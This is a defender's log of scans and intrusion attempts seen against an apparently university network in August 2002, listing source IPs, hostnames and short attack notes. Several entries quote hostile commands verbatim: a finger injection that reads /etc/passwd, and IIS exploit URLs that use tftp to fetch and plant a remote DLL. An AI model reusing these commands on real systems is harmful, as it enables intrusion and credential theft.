Short summary of some of the attacks against us for AuG. 2002


 year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes

2002/08/01-03:30:00.20 68.82.236.114 (pcp01469733pcs.lncstr01.pa.comcast.net) anon ftp attack, CWD overflow attacks.
2002/08/01-03:30:00.20 68.82.236.114 (pcp01469733pcs.lncstr01.pa.comcast.net) scannet for port 21
2002/08/01-05:04:50.91 211.240.35.151 (DIGITODOTCOM,SEOUL,KR) scannet for port 111 - statdx exploit attack
2002/08/01-05:50:58.27 151.201.244.34 (pool-151-201-244-34.pitt.east.verizon.net) scannet for ports 137,445
2002/08/01-07:35:20.53 211.44.112.179 (korea crap) scannet for port 21
2002/08/01-09:39:58.85 151.201.244.34 (pool-151-201-244-34.pitt.east.verizon.net) heavy probe of selcted MS servers
2002/08/01-12:53:45.97 213.93.93.11 (e93011.upc-e.chello.nl) nimda attack (file RICHED20.dll)
2002/08/01-13:13:58.80 132.235.197.128 (raubenolt.cns.ohiou.edu)  SNMP AgentX/tcp, scan port 161,1080 on boss
2002/08/01-14:03:15.92 213.93.93.11 (e93011.upc-e.chello.nl) ping scan, scannet for ports 139 445, heavy probe of select ips
2002/08/01-15:06:49.25 64.119.98.8 (gelco.cpe.tor.futureway.com) scannet for port 1433
2002/08/01-16:47:48.55 64.119.98.8 (gelco.cpe.tor.futureway.com) attempt multiplt MS-SQL sa logins
2002/08/01-18:21:19.58 24.208.177.125 (dhcp024-208-177-125.columbus.rr.com) pound on net printer port 631
2002/08/01-19:59:56.18 12.119.127.22 (AT&T ITS,NJ,US) scannet fo rport 138
2002/08/01-21:17:44.97 217.128.241.100 (ABordeaux-202-1-1-100.abo.wanadoo.fr) scannet for port 21
2002/08/02-03:29:36.74 217.128.250.49 (AMarseille-201-1-5-49.abo.wanadoo.fr) scannet for port 21
2002/08/02-04:10:21.74 217.128.250.49 (AMarseille-201-1-5-49.abo.wanadoo.fr) scannet for port 21
2002/08/02-06:39:09.61 64.81.195.164 (dsl081-195-164.nyc2.dsl.speakeasy.net) scannet for port 445
2002/08/02-07:01:29.09 64.81.195.164 (dsl081-195-164.nyc2.dsl.speakeasy.net) hit selected ips on port 139
2002/08/02-07:20:47.60 64.81.195.164 (dsl081-195-164.nyc2.dsl.speakeasy.net) scannet for ports 139,445,NETBIOS Samba clientaccess
2002/08/02-08:14:10.43 212.179.7.195 (main.avalon-net.co.il) SNMP AgentX/tcp request 132.235.17.17
2002/08/02-10:29:55.82 66.114.144.57 (pia144-57.pioneernet.net) scannet for port 139
2002/08/02-12:33:52.54 80.11.24.132 (AOrleans-103-1-1-132.abo.wanadoo.fr) scannet for port 21
2002/08/02-13:11:28.49 132.235.130.234 (ouc234.chillicothe.ohiou.edu) scannet for port 80, code red..
2002/08/02-14:18:05.08 132.235.32.72 (lab020-pc72.cob.ohiou.edu) scannet for port 80
2002/08/02-16:39:11.87 62.10.91.235 (ppp-62-10-91-235.dialup.tiscali.it) scannet for port 21
2002/08/03-03:57:01.11 151.201.244.34 (pool-151-201-244-34.pitt.east.verizon.net) scannet for port 139,445
2002/08/03-05:33:51.54 194.8.164.17 (sep.date-spb.ru) use anon ftp to get dummy passwd file from ace
2002/08/03-09:13:41.54 213.189.162.53 (NETWORKIP5BRUTELE,BRUXELLS, BE) scannet for port 21
2002/08/03-09:15:19.54 66.237.120.204 (XO Communications,CA,US) scannet fo rport 25
2002/08/03-19:31:48.78 195.232.54.17:21 (fra-tgn-oyv-vty17.as.wcom.net) scannet for port 21
2002/08/03-19:32:36.37 195.232.54.17:21 (fra-tgn-oyv-vty17.as.wcom.net) probe port 1524, buff overflow attack port 6112-CDE
2002/08/04-01:45:22.50 172.162.158.190 (ACA29EBE.ipt.aol.com) ping scan of net,port 80 scan , iis atacks
2002/08/04-06:50:50.93 217.35.21.127 (host217-35-21-127.in-addr.btopenworld.com) scannet for port 1433
2002/08/04-07:26:12.48 131.96.115.83 (Development1.gsu.edu) scannet for port 80
2002/08/04-17:25:36.77 24.208.177.125 (dhcp024-208-177-125.columbus.rr.com) bang on network printer port 631
2002/08/05-10:29:00.34 194.98.189.139 (INGENCYS,FR) scannet for port 111, RPC EXPLOIT statdx
2002/08/05-10:35:55.06 205.158.210.172 (XO Communications,CA,US) scannet fo rport 139
2002/08/05-15:29:05.82 216.221.57.223 (dsl-57-223.aei.ca) scannet for ports 22, 80, 1433, ping
2002/08/05-15:36:38.02 65.198.68.56 (netmapper.research.lumeta.com) probe high ports on several ips UDP  2-3x/hr
2002/08/05-15:37:43.18 216.221.57.223 (dsl-57-223.aei.ca) MS-SQL xp_cmdshell - program execution -> 132.235.18.147
2002/08/05-21:57:17.33 24.208.177.125  (dhcp024-208-177-125.columbus.rr.com) bang on network printer port 631
2002/08/05-22:12:40.69 62.211.252.165 (Telecom Italia,IT) ICMP Broadscan Smurf Scanner
2002/08/06-02:24:52.84 61.182.50.241 (CHINANET Hebei province network,CN) scannet for port 111, RPC EXPLOIT statdx
2002/08/06-03:22:28.43 216.229.196.176 (Mississippi Dept. of Education,MS,US) portscan ace
2002/08/06-05:55:14.72 216.229.196.29 (Mississippi Dept. of Education,MS,US) multiple WWW attacks against ace
2002/08/06-06:46:49.79 130.219.50.151 (Upa-Mail.UMDNJ.EDU) scannet for port 1433
2002/08/06-06:47:51.27 130.219.50.151 (Upa-Mail.UMDNJ.EDU) scannet for port 1433
2002/08/06-06:51:17.51 130.219.50.151 (Upa-Mail.UMDNJ.EDU) MS-SQL xp_cmdshell - program execution -> 132.235.18.147, change passwd
2002/08/06-06:51:21.19 210.54.170.105 (ESURF-NZ,NZ) EXPLOIT CDE dtspcd exploit attempt
2002/08/06-08:15:46.24 132.235.196.91 (OU)  start of attacks till 2002/08/06-10:42:19.86
2002/08/06-08:15:46.24 132.235.196.91 (OU) portscan 132.235.1.[1,2,3,5], mutilple probes on multiple ports followup.
2002/08/06-08:22:02.34 132.235.196.91 (OU) portscan 132.235.1.5
2002/08/06-08:24:06.68 132.235.196.91 (OU) attack ace via finger port w/ cmd |/bin/cat /etc/passwd
2002/08/06-08:31:18.31 132.235.196.91 (OU) portscan 132.235.1.7,, mutilple probes on multiple ports followup.
2002/08/06-08:45:04.04 132.235.196.91 (OU) portscan 132.235.1.11, mutilple probes on multiple ports followup.
2002/08/06-09:12:00.52 132.235.196.91 (OU) portscan 132.235.1.30 
2002/08/06-09:26:38.85 132.235.196.91 (OU) portscan 132.235.1.23
2002/08/06-09:35:25.70 132.235.196.91 (OU) portscan 132.235.1.24
2002/08/06-10:16:55.24 141.154.5.71 (Applied Metrix,MA,US) scannet for port 139
2002/08/06-12:42:17.82 64.226.243.8 (testrax.com) scannet for port 1433
2002/08/06-13:24:08.68 64.226.243.8 (testrax.com) MYSQL attacks - xp_cmdshell - program execution,password change 
2002/08/06-17:42:52.98 211.141.65.4 (China Mobile Communications Corporation,CN) scannet for port 21
2002/08/06-18:11:15.10 65.92.21.47 (HSE-London-ppp3510065.sympatico.ca) scannet for port 80
2002/08/06-20:31:44.69 195.128.139.141 (139-141-dialup.samara.ru) use anon ftp to get dummy passwd file from ace
2002/08/06-22:11:41.26 196.40.44.38 (Frente Universidad Braulio Carrillo, Paseo Colon,CR) scannet for port 1433
2002/08/06-23:09:42.65 66.66.31.23 (syr-66-66-31-23.twcny.rr.com) scannet for port 1433
2002/08/07-00:20:33.65 218.52.9.9 (Hanaro Telecom Co.,KR) scannet for port 1433
2002/08/07-05:45:19.98 80.35.246.93 (93.Red-80-35-246.pooles.rima-tde.net) anon ftp dummy passwd file from ace
2002/08/07-09:11:14.81 66.214.132.105 (66-214-132-105.gln-res.charterpipeline.net) scannet for port 1433
2002/08/07-11:13:21.49 217.96.243.172 (pc172.jeleniag.sdi.tpnet.pl) scannet for port 22
2002/08/07-11:36:33.10 62.47.0.170 (N454P010.adsl.highway.telekom.at) scannet for port 21
2002/08/07-12:07:38.17 138.238.5.135 (Howard University ,WASHINGTON DC,US) scannet for port 445
2002/08/07-12:08:27.90 140.114.106.17 (ael.ns.nthu.edu.tw) scannet for port 445
2002/08/07-12:08:45.68 149.169.38.83 (cc17.eas.asu.edu) scannet for port 445
2002/08/07-12:09:36.68 207.5.240.126 (d-207-5-240-126.s-way.com) scannet for pot 445
2002/08/07-12:13:17.87 138.238.143.150 (Howard University ,WASHINGTON DC,US) scannet for port 445
2002/08/07-12:16:52.14 4.60.101.60 (lsanca1-ar11-4-60-101-060.lsanca1.dsl-verizon.net) scannet for pot 445
2002/08/07-12:17:45.48 140.114.79.64 (ants14.cs.nthu.edu.tw) scannet for port 445
2002/08/07-12:32:59.52 65.198.68.56 (netmapper.research.lumeta.com) slow scan of high ports on 132.235.1.3
2002/08/07-17:38:09.51 62.0.5.220 (Kinneret,IL) IIS attack w/cmd tftp%20-i%20132.147.17.220%20GET%20cool.dll%20c:\httpodbc.dll
2002/08/07-22:20:53.25 194.206.91.3 (JET LAG,FR) scannet for port 46682
2002/08/08-05:46:45.75 218.2.166.23 (CHINANET jiangsu province network) scannet for ports 8080,8888,10088,81,3128,80,1813,5262
2002/08/09-04:00:39.49 64.58.166.193 (64-58-166-193.cbi.cox-oc.net) scannet for port 6112
2002/08/09-10:35:25.20 129.217.25.2 (minasmorgul.cs.uni-dortmund.de) proge ace ports 4402,4403,4404
2002/08/09-10:56:09.45 217.82.38.139 (pD952268B.dip.t-dialin.net) scannet for port 445, followups to selct ips ports 80,156,3306, 445 1112 1433  1434 etc
2002/08/09-14:43:11.90 172.186.71.74 (ACBA474A.ipt.aol.com) scannet for port 21
2002/08/09-15:28:44.50 216.77.9.139 (Bellsouth.net, Inc.,GA,US) scannt fo port 139
2002/08/09-17:01:35.81 66.56.174.10 (gso56-174-010.triad.rr.com) scannet for port 80, mulitpt IIS attacks on multiple servers.
2002/08/09-18:03:39.10 204.141.115.253 (Verio, Inc. ) 1. attack IIS server 132.235.18.102 w/ ftp to 209.207.210.164 w/cmd
2002/08/09-18:03:39.10 204.141.115.253 (Verio, Inc. ) 2. %20/ServUDaemon.ini%20c:\test.ini>>c:\config.txt
2002/08/09-21:05:20.58 213.98.20.99 (213-98-20-99.uc.nombres.ttd.es) use anon ftp to get dummyh passwd file from ace
2002/08/10-04:54:55.23 209.61.184.243 (Rackspace.com ,TX, US) scannet for port 139,445,137
2002/08/10-08:10:34.12 24.54.36.84 (Adelphia Cable ,PA,US) scannet fo rpot 1433
2002/08/10-12:58:09.35 211.192.214.148 (korea crap) scannet for port 1433
2002/08/10-15:07:00.52 207.224.28.89 (mail.glickhead.com) scannet for port 21
2002/08/11-03:20:31.95 24.66.43.26 (h24-66-43-26.wp.shawcable.net) scannet for port 139,445,137
2002/08/11-05:17:24.97 65.128.207.177 (0-1pool207-177.nas13.philadelphia1.pa.us.da.qwest.net) scannet for port 21
2002/08/11-09:05:13.52 212.195.186.19 (lns14v-3-19.w.club-internet.fr) scannet for port 21
2002/08/11-10:34:49.73 212.185.235.80 (pD4B9EB50.dip.t-dialin.net) scannet for port 139,445,137
2002/08/11-15:02:24.57 24.66.43.26 (h24-66-43-26.wp.shawcable.net) scannet for port 139,445,137
2002/08/11-16:47:33.29 172.156.230.197 (America Online) scannet for port 1433
2002/08/11-18:48:26.61 217.228.148.186 (pD9E494BA.dip.t-dialin.net) ping scan of net
2002/08/11-22:38:49.65 24.123.46.10 (rrcs-central-24-123-46-10.biz.rr.com) scannet fo rport 515
2002/08/12-01:46:09.96 131.178.225.177 (auditoria.itesm.mx) scannet for port 1433
2002/08/12-02:23:03.52 211.45.138.206 (KUMI COMPUTER CLASS,SEOUL,KR) scannet for port 1433
2002/08/12-06:49:47.23 147.102.177.1 (iktinos.arch.ntua.gr) scannet for port 1433
2002/08/12-06:50:47.84 80.178.3.75 (Golden Lines International Communication Services Ltd.,IL) scannet fo rprt 1433
2002/08/12-06:57:03.76 147.102.177.1 (iktinos.arch.ntua.gr) scan net w/ ICMP webtrends scanner 
2002/08/12-06:58:39.42 147.102.177.1 (iktinos.arch.ntua.gr) try to logon to MS-SQL: server as user sa/
2002/08/12-07:35:23.05 147.102.177.1 (iktinos.arch.ntua.gr) ICMP scan of net with  webtrends scanner
2002/08/12-10:45:33.33 195.61.21.200 (generic.sema.es) use anon/ftp to get passwd file from ace
2002/08/12-11:10:05.64 65.56.79.86 (dialup-65.56.79.86.Dial1.Miami1.Level3.net) scannet for port 139
2002/08/12-12:30:35.69 217.124.12.133 (217-124-12-133.dialup.nuria.telefonica-data.net) use anon/ftp to get passwd file from ace
2002/08/12-14:15:38.59 217.88.219.165 (pD958DBA5.dip.t-dialin.net) scannet for port 1433
2002/08/12-15:11:31.36 80.13.241.77 (AAmiens-106-1-11-77.abo.wanadoo.fr) scannet for port 21
2002/08/12-17:39:16.37 12.240.132.28 (AT&T ITS ,NJ,US) scannet for port 1433
2002/08/12-21:38:11.75 211.162.79.99 (SHENZHEN,GUANGDONG,CHINA,CN) scannet for port 8080,80
2002/08/13-01:20:18.52 211.91.218.140 (Changsha xiangya hospital,CN) probe 132.235.37.68 : 8080 
2002/08/13-03:33:26.68 4.47.20.5 (chcgil2-ar6-4-47-020-005.chcgil2.elnk.dsl.genuity.net) scannet for port 1433,80
2002/08/13-03:33:57.32 4.47.20.5 (chcgil2-ar6-4-47-020-005.chcgil2.elnk.dsl.genuity.net) scannet fo rport 1433,80
2002/08/13-03:50:19.91 209.21.92.165 (Amernet,CA,US) scannet for port 21
2002/08/13-03:50:28.44 209.21.92.165 (Amernet , CA, US) scannet for port 21
2002/08/13-07:00:09.15 217.88.215.24 (pD958D718.dip.t-dialin.net) scannet for port 80
2002/08/13-08:26:10.16 80.116.216.200 (host200-216.pool80116.interbusiness.it) MS_SQL sa login failed on multiple machines
2002/08/13-08:46:03.88 216.112.5.130 (w130.z216112005.sjc-ca.dsl.cnc.net) scannet for port 80,1433
2002/08/13-14:13:12.33 12.254.182.103 (12-254-182-103.client.attbi.com) scannet for port 1433
2002/08/13-16:26:06.59 67.81.65.166 (ool-435141a6.dyn.optonline.net) scannet for port 445,80
2002/08/13-17:15:25.79 67.34.60.23 (adsl-34-60-23.mia.bellsouth.net) scannet for port 139,445
2002/08/13-17:29:03.01 67.34.88.204 (adsl-34-88-204.mia.bellsouth.net) scannet for port 139,445
2002/08/13-17:56:33.71 68.69.208.14 (oh-strongsvillecadent1-1aa-14.clvhoh.adelphia.net) probe 132.235.1.11 ports 6500,21,23
2002/08/13-22:44:54.52 146.115.74.86 (146-115-74-86.c3-0.lex-ubr1.sbo-lex.ma.cable.rcn.com) try anon/ftp to get passwd file on ace
2002/08/14-00:56:27.28 205.185.236.188 (as02.def-mi-0-188.rasserver.net) scannet for port 139,445,80,137
2002/08/14-10:39:46.52 213.120.107.231 (host213-120-107-231.in-addr.btopenworld.com)) scannet for ports 80,445,139,137
2002/08/14-14:09:52.05 212.135.119.242 (Delta Books International,SURREY,GB) scannet for port 1433
2002/08/14-15:39:33.07 66.134.183.195 (h-66-134-183-195.DNVTCO56.covad.net) scannet for port 21
2002/08/14-15:52:15.56 202.99.44.243 (CHINANET Beijing province network) scannet for port 21
2002/08/14-16:02:02.59 65.198.68.56 (netmapper.research.lumeta.com) bang on 132.235.1.3 1 packet per hour
2002/08/14-16:51:49.72 205.185.237.212 (as11.def-mi-0-212.rasserver.net)  scannet for port 139,445,80,137
2002/08/14-22:36:38.13 63.10.144.27 (1Cust27.tnt14.lax7.da.uu.net) scannet for port 1433
2002/08/14-23:07:21.86 80.230.208.212 (Euronet Digital Communications.IL) scannet fo  port 1433
2002/08/15-06:12:08.41 80.139.213.119 (p508BD577.dip.t-dialin.net) CDE dtspcd exploit attemptCDE dtspcd exploit attempts
2002/08/15-10:43:57.09 61.94.153.102 (PT. Telekomunikasi Indonesia,ID) probe ace ports 79,23,80,143,53,110,23,111,80
2002/08/15-12:08:03.27 212.211.94.21 (fra-tgn-oyo-vty21.as.wcom.net) scannet for port 21
2002/08/15-12:09:02.33 210.228.155.50 (Telecom Staff, Inc,JP) anon ftp buff overflow attacks(RNFR ./././././././.)
2002/08/15-14:04:08.39 64.162.177.182 (adsl-64-162-177-182.dsl.lsan03.pacbell.net) attempt to get .htpasswd file
2002/08/15-14:29:14.41 80.139.213.119 (p508BD577.dip.t-dialin.net) CDE dtspcd exploit attemptCDE dtspcd exploit attempts
2002/08/15-22:31:31.76 68.49.111.238 (pcp771969pcs.dalect01.va.comcast.net) scannet for ports 80,445
2002/08/16-06:50:29.41 196.28.49.120 (196-28-49-120.prtc.net)  scannet for port 1433
2002/08/16-08:35:26.04 61.171.34.149 (CHINANET Shanghai province network) portscan net for ports 80,8080,8888,8000,81.10080,l1080,3128
2002/08/16-09:20:31.48 80.235.22.34 (80-235-22-34-dsl.plus.estpak.ee) scannet for port 1433
2002/08/16-10:22:06.13 61.166.251.87 (CHINANET Yunnan province network)scannet for port 8080,80,8000,10080,81,3128,8888
2002/08/16-12:23:31.45 209.149.209.141 (Bellsouth.net, Inc. ) scannet for port 515
2002/08/16-20:19:05.36 216.221.63.141 (dsl-63-141.aei.ca) probe ports 139,137,445 on multiple ips
2002/08/16-23:08:47.71 211.144.94.54 ( Cable OnLine Network YANGPU2POPNet,SHANGHI,CN) scannet for ports 8080l80l8000,3128,1080,1813
2002/08/16-23:28:58.22 68.41.51.130 (bgp946576bgs.canton01.mi.comcast.net) scan 132.235.1.11 port 8080
2002/08/17-00:13:44.71 24.208.180.192 (dhcp024-208-180-192.columbus.rr.com) portscan 132.235.1.7
2002/08/17-00:34:17.02 24.205.20.225 (24-205-20-225.mpk-eres.charterpipeline.net)) scannet for port 445
2002/08/17-00:34:17.37 142.177.235.230 (nat235-230.mpoweredpc.net) scannet for port 445
2002/08/17-00:34:28.61 24.103.36.47 (CPE00e0182293b8-CM0010954a63e0.cpe.net.cable.rogers.com) scannet for port 445
2002/08/17-00:35:29.51 142.177.242.55 (islandtelecom242-55.islandtelecom.com) scannet for port 445
2002/08/17-00:35:46.27 129.100.227.115 (University of Western Ontario,CA) scannet for port 445
2002/08/17-00:35:56.52 24.205.133.228 (24-205-133-228.mpk-eres.charterpipeline.net)  scannet for port 445
2002/08/17-00:36:15.92 24.103.211.67 (CPE014490007213.cpe.net.cable.rogers.com) scannet for port 445
2002/08/17-03:25:59.25 66.159.16.26 (server.iicinternet.com) scan several ips for port 1080
2002/08/17-12:13:11.55 207.90.89.75 (d74.as0.wlmg.oh.voyager.net) probe mult. ips on ports 111, 32773, 79-(operator, user)
2002/08/17-15:53:27.07 193.224.239.199 (utbontas.fph.hu) scannet for port 1433
2002/08/17-16:11:14.36 68.49.111.238 (pcp771969pcs.dalect01.va.comcast.netscannet fro pors 80,445
2002/08/17-19:31:13.21 24.123.46.10 (rrcs-central-24-123-46-10.biz.rr.com) scannet for port 515
2002/08/17-22:45:26.53 12.251.202.108 (12-251-202-108.client.attbi.com) scannet fro pors 80,445
2002/08/18-00:24:31.34 80.32.136.101 (101.Red-80-32-136.pooles.rima-tde.net) scannet for port 21
2002/08/18-07:53:27.95 195.204.147.80 (www-sec-1.nndata.no) scannet for port 1433
2002/08/18-15:08:41.46 203.69.248.194 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) scannet for port 21
2002/08/19-01:46:45.46 128.187.146.13 (rbyoung.byu.edu) scannet for ports 445, 139, 1433, 137, 
2002/08/19-07:29:18.28 61.70.190.178 () cde buff overflow attaack on 132.235.15.206
2002/08/19-08:39:14.72 193.170.208.73 () scannet for port 1433
2002/08/19-08:44:47.04 193.170.208.73 () scannet for port 1433
2002/08/19-11:59:51.04 203.115.15.12() scannet for port 1433
2002/08/19-12:06:20.03 203.115.15.12 () scannet for port 1433
2002/08/19-14:21:44.06 64.221.30.76 () scannet for port 22
2002/08/19-15:22:01.03 141.158.125.34 () scannet for port 139
2002/08/19-18:47:10.12 67.81.105.74 () scannet for port 139 445
2002/08/19-19:24:27.07 142.177.235.230 () scannet for port 139 445
2002/08/20-02:00:46.81 24.114.42.75 () scannet for port 445,80
2002/08/20-02:13:32.12 24.114.42.75 () scannet for port 80 445
2002/08/20-02:17:22.88 24.188.140.73 () scannet for port 445,80
2002/08/20-02:25:07.14 172.152.41.45 () scannet for port 139
2002/08/20-03:18:29.31 24.188.140.73 () scannet for port 445 139
2002/08/20-06:47:35.94 213.26.231.207 (ASKESIS SRL,IT) scannet for port 1214
2002/08/20-09:55:25.69 213.189.162.53 (Brutele SC,BRUXELLES,BE) scannet for port 21
2002/08/20-13:00:10.84 12.151.200.201 (PLUMROSE USA,MS,USS) scannet for port 1433
2002/08/20-14:28:41.25 216.65.197.97 (Dallas IDC ,TX,US) scannet for port 1433
2002/08/20-17:41:56.59 24.114.42.75 (Rogers Cable Inc.,ONTARIO,CA) start of continuous probes on port 445 on all IPS. till 00:37:26
2002/08/20-17:46:42.75 80.32.194.79 (79.Red-80-32-194.pooles.rima-tde.net) ftp dummy passwd file from ace
2002/08/20-18:25:05.95 213.139.24.166 (Grupo Munreco,SPAIN) scannet for port 1433
2002/08/20-19:56:09.89 217.85.38.163 (pD95526A3.dip.t-dialin.net) scannet for port 80, IIS attacks
2002/08/20-21:48:29.09 212.202.220.26 (GINKO Gesellschaft fuer Internet-Kommunikation mbH,DE) scannet for port 1433
2002/08/20-21:48:49.01 212.202.220.26 (GINKO Gesellschaft fuer Internet-Kommunikation mbH,DE)ICMP superscan echoo fnet
2002/08/20-23:28:14.87 61.96.25.242 (DREAMX-CATV-HAMANBS-KR,KR) scannet for port 1433
2002/08/21-06:17:43.58 195.55.30.27 (PRINCAST,ES) ftp dummy passwd file from ace
2002/08/21-06:28:05.37 24.43.54.240 (CPE0080c6f02f26.cpe.net.cable.rogers.com) scannet for port 445
2002/08/21-06:29:09.87 24.43.54.240 (CPE0080c6f02f26.cpe.net.cable.rogers.com) start of continuous probes on port 445 til 14:36:16.66
2002/08/21-08:18:56.25 195.55.30.27 (Principado de Asturias,ES) repeatedly try to anon ftp /etc/passwd.bak
2002/08/21-11:37:22.65 80.11.152.94 (AToulouse-105-1-11-94.abo.wanadoo.fr)  scannet for port 21
2002/08/21-12:27:43.62 165.176.10.46 (Commonwealth of Virgina DepartmentofInformation Technology,US) scannet for port 1433
2002/08/21-14:02:38.29 68.55.123.37 (pcp343900pcs.owngsm01.md.comcast.net) scannet for port 139
2002/08/21-16:23:06.09 64.192.211.105 (dsl-64-192-211-105.telocity.com)  scannet for port 21
2002/08/21-16:28:43.20 64.251.6.192 (IHosting,FL,US) scannet for ports 1080,3128
2002/08/21-17:15:58.84 61.172.246.78 (Shanghai Information Industrial Co.,CN)  scannet for port 1080
15.112.148.195.IN-ADDR.ARPA domain name pointer vi015.piramk.fi
2002/08/21-17:35:56.59 63.196.59.36 (adsl-63-196-59-36.dsl.lsan03.pacbell.net) scannet for port 139
2002/08/21-17:47:18.09 194.85.32.18 (Federal Node RUNNet in IFMO,St.Petersburg,RU)  scannet for port 1080
2002/08/21-23:27:19.58 217.231.201.87 (pD9E7C957.dip.t-dialin.net) use anon /ftp to get /etc/passwd on ace
2002/08/21-23:43:00.74 217.231.254.153 (pD9E7FE99.dip.t-dialin.net) try to login to ace w/decrypted passwds from dummy passwd file.
2002/08/21-23:50:47.44 217.231.249.105 (pD9E7F969.dip.t-dialin.net) use anon /ftp to get /etc/passwd.bak on ace
2002/08/21-23:59:40.04 217.231.249.105 (pD9E7F969.dip.t-dialin.net)  use anon /ftp to get /etc/passwd on ace
2002/08/22-00:39:33.50 66.150.8.30 (www.integrityonline.com) scannet for port 1433
2002/08/22-02:23:02.68 66.150.8.30 (www.integrityonline.com) try to login to SQL server as user sa on several ips
2002/08/22-02:34:40.15 68.82.236.96 (pcp01469715pcs.lncstr01.pa.comcast.net)  scannet for port 21
2002/08/22-02:58:44.56 80.19.101.23 (host23-101.pool8019.interbusiness.it) scannet for port 139
2002/08/22-05:07:15.30 193.230.177.204 (Reteaua Canad Systems, Internet Service Provider,RO) try to telnet to boss as test/test, student/student
2002/08/22-05:37:17.20 195.27.218.62 (BMW AG,MUNICH,GD) probe port 6000 on several ips
2002/08/22-06:57:00.98 211.161.121.8 (FOR GWBN WUHAN LAODONG STREET ,CN) scannet for oprt 1433
2002/08/22-06:57:16.14 211.161.121.8 (GWBN WUHAN LAODONG STREET #2 PHASE (broadband), CN) sannet for port 1433
2002/08/22-10:20:32.05 61.147.60.129 (CHINANET jiangsu province network) attack IIS server-tftp%20-i%20132.235.80.31%20GET%20cool.dll
2002/08/22-10:37:56.16 210.83.207.251 (China Netcom Corp.,CN) scannet for port 21
2002/08/22-12:33:47.01 67.240.60.203  (1Cust203.tnt4.winston-salem.nc.da.uu.net) scannet for port 139
2002/08/22-13:15:42.22 195.148.112.15 (vi015.piramk.fi) scannet for port 1433. probe sql servers.
2002/08/22-16:53:24.90 211.75.49.156 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) scannet for port 23,21
2002/08/22-16:54:17.30 211.75.49.156 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) telnet solaris memory mismanagement exploit attempt
2002/08/22-19:48:16.16 61.177.255.218 (CHINANET jiangsu province network) attack IIS server-tftp%20-i%20132.235.80.31%20GET%20cool.dll
2002/08/22-19:54:06.11 207.224.28.89 (mail.glickhead.com) scannet for port 21
2002/08/22-21:03:24.57 209.47.27.187 (user187.accesscable.com) 1. hack windows box, install irc server (reflector?)
2002/08/22-21:03:24.57 209.47.27.187 (user187.accesscable.com) 2. install ftp on port 1024
2002/08/23-00:33:15.88 61.1.50.190  (Bharat Sanchar Nigam Limited,IN) scannet for port 139